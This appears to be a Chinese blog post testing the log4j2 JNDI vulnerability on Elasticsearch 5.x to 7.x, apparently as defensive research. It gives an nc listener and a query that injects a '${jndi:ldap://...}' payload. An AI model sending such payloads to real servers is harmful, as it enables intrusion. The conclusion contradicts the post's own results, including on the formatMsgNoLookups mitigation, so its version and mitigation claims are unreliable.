Elasticsearch与最新的log4j2零日漏洞

2021-12-16 09:32:11 浏览数 (3)

今天真的是焦头烂额,新出来的这个log4j2零日漏洞看起来杀伤力极大,影响了Apache Struts2, Apache Solr, Apache Druid, Apache Flink等重量级的开源项目。当然也包括我们的Elasticsearch。在官方正式的通告、解决方案,补丁出来之前,我这里先简答说一下我个人的测试结果(注意,不代表官方!)

划重点:

我个人的测试结果是:只有ES 5 JDK8能复现。ES 5 JDK12,ES 6 JDK8,ES 7 JDK8均无法进行远程代码执行

测试方案:

  • 使用nc命令,查看网络连接情况,这里我监控的是1388接口: nc -l 1388
  • 构造特殊查询,使ES打印出会访问1388端口的ldap语句:
代码语言:txt复制
// 注意,要先把call_date定义为date类型
{
  "query": {
    "bool": {
      "filter": {
        "bool": {
          "must": [
            {
              "term": {
                "call_date": "${jndi:ldap://127.0.0.1:1388/a}"
              }
            }
          ]
        }
      }
    }
  }
}
  • 然后查看特定端口会不会被连接

测试结果

5.3.0 JDK 8

执行测试方案,关键语句 ${jndi:ldap://127.0.0.1:1388/a} 被打印,同时1388端口被连接

image.pngimage.png

5.3.0 JDK 12

执行测试方案,关键语句 ${jndi:ldap://127.0.0.1:1388/a} 被打印,同时1388端口被连接

image.pngimage.png

5.6.16 JDK 8

执行测试方案,关键语句 ${jndi:ldap://127.0.0.1:1388/a} 被打印,同时1388端口被连接

image.pngimage.png

5.6.16 JDK 8 -Dlog4j2.formatMsgNoLookups=true

config/jvm.options中添加-Dlog4j2.formatMsgNoLookups=true, 执行测试方案,关键语句 ${jndi:ldap://127.0.0.1:1388/a} 被打印,同时1388端口被连接

image.pngimage.png

5.6.16 JDK 12

执行测试方案,关键语句 ${jndi:ldap://127.0.0.1:1388/a} 被打印,同时1388端口被连接

image.pngimage.png

6.0.1 JDK 8

执行测试方案,关键语句 ${jndi:ldap://127.0.0.1:1388/a} 被打印,同时1388端口被连接

image.pngimage.png

6.0.1 JDK 12

执行测试方案,关键语句 ${jndi:ldap://127.0.0.1:1388/a} 被打印,同时1388端口被连接

image.pngimage.png

7.14.1 JDK 8

执行方案有变,关键语句 ${jndi:ldap://127.0.0.1:1388/a} 通过slow log打印(在7.14上,之前的方案无法再触发runtime log的异常打印)。1388端口被连接

image.pngimage.png

测试结论

在大家都普遍升级到5.x以上版本的今天,看起来log4j2零日漏洞对ES的影响并不大。而对于5.x版本的用户,使用-Dlog4j2.formatMsgNoLookups=true,就能避免这个问题(如果JDK本身就是8以上的版本,都不用重启)。但毕竟这次测试并没有过于深入,让我们静待官方最终的调查结果和方案吧

1 人点赞